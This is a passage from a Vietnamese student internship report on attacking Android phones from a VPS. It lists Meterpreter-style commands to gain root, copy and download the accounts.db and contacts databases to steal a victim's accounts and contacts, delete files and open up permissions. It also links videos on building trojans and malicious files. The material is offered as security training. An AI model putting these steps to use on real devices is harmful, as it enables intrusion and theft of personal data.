X. TẤN CÔNG MÁY ANDROID TỪ MÁY VPS
3. Các phương thức tấn công được sử dụng:
Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân.
3.1 Ghi âm lén:
3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard:
Di chuyển vào thư mục bằng lệnh: cd
Tải về bằng lệnh: download <tên file>
Xóa tập tin bằng lệnh: rm <tên file>
3.4 Truy cập trực tiếp vào hệ thống:
Truy cập vào hệ thống bằng lệnh: “shell” > “su”
Kiểm tra máy đã root hay chưa bằng lệnh: “whoami”
Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có
3.5 Truy cập và khai thác tài khoản người dùng:
Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l”
Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”
Trở về meterpreter và tải file accounts.db về:
3.6 Truy cập và đánh cắp danh bạ điện thoại:
Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại:
“cd /data/data/com.android.providers.contacts/databases” Copy về thẻ sdcard và tải về máy
Xem nội dung của contacts2.db bằng SQLite Manager
3.7 Một số câu lệnh khác:
- Để biết thêm về các lệnh có thể thực hiện ta dùng help
- ls -l danh mục file và các quyền
- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền
/DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/
- Để xem danh sách và down load các file hay thay đổi các file trong ROM
Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename
Ví dụ chmod -R 777 /data
KẾT LUẬN
Qua thời gian thực tập tại Trung tâm ATHENA, em đã học hỏi được rất nhiều kiến thức cũng như kinh nghiệm sống. Phong cách và môi trường làm việc chuyên nghiệp, tinh thần trách nhiệm cao, sự quyết tâm và sáng tạo trong công việc, sự cần cù, siêng năng, chăm chỉ.
Do thời gian thực tập chưa lâu, kiến thức bản thân còn hạn chế nên dù đã cố gắng nhưng báo cáo thực tập của em sẽ không tránh khỏi những sai sót, khuyết điểm. Em rất mong được sự góp ý chỉ bảo của các thầy cô để báo cáo thực tập của em được hoàn chỉnh hơn.
Một lần nữa, em xin cảm ơn đến các thầy cô trong trường Đại học Khoa Học Tự Nhiên – TP Hồ Chí Minh, các thầy cô, các anh chị công tác trong khoa Điện Tử Viễn Thông và em xin chân thành cảm ơn thầy Võ Đỗ Thắng cùng các thầy cô và các anh chị trong trung tâm ATHENA đã tận tình giúp đỡ em hoàn thành báo cáo này.
TP. Hồ Chí Minh, ngày 3 tháng 11 năm 2014
Sinh viên thực hiện
http://youtu.be/DkxtthrNb9o Cài đặt Kali Linux trên VMware
http://youtu.be/90e-w3SGJnY
Cài đặt trojan iCalendar và trojan iMatch
http://youtu.be/1JE0hrsZmsk
Tạo file chứa mã độc để tấn công vào máy Android
http://youtu.be/iEawr1JupZ8
Tạo mã độc tên trang web bằng XSSF
http://youtu.be/1Jw8F_H0Jz4
Tấn công Android từ môi trường VPS
http://youtu.be/4Ueat8f-OoM
Clip giới thiệu bản thân và đề tài thực tập
http://youtu.be/iRfXCEXI9lo Clip tổng kết đề tài
PHỤ LỤC II: TRÍCH DẪN NGUỒN THAM KHẢO http://www.quantrimang.com.vn/lo-hong-bao-mat-nghiem-trong-de-doa-82- may-android-110510 http://sinhvienit.net/forum http://forum.bkav.com.vn http://developer.android.com/sdk/index.html#download http://www.oracle.com/technetwork/java/javase/downloads http://choimobile.vn/forums/#thao-luan-hdh-android.62 http://www.oracle.com/technetwork/server- storage/virtualbox/downloads/index.html http://www.genymotion.com/ http://www.whitehat.vn/threads/ https://code.google.com/p/dex2jar/ https://code.google.com/p/innlab/downloads/detail?name=jd-gui- 0.3.3.windows.zip& http://mobilelife.vn/resources/super-apk-tool-v2-0-cong-cu-chinh-sua-apk- bang-giao-dien-cuc-manh.12/
Giáo trình khóa học System Hacking – Trung tâm đào tạo ATHENA –
www.Athena.Edu.Vn
Giáo trình Lập trình trên thiết bị di động Android – Trung tâm Tin Học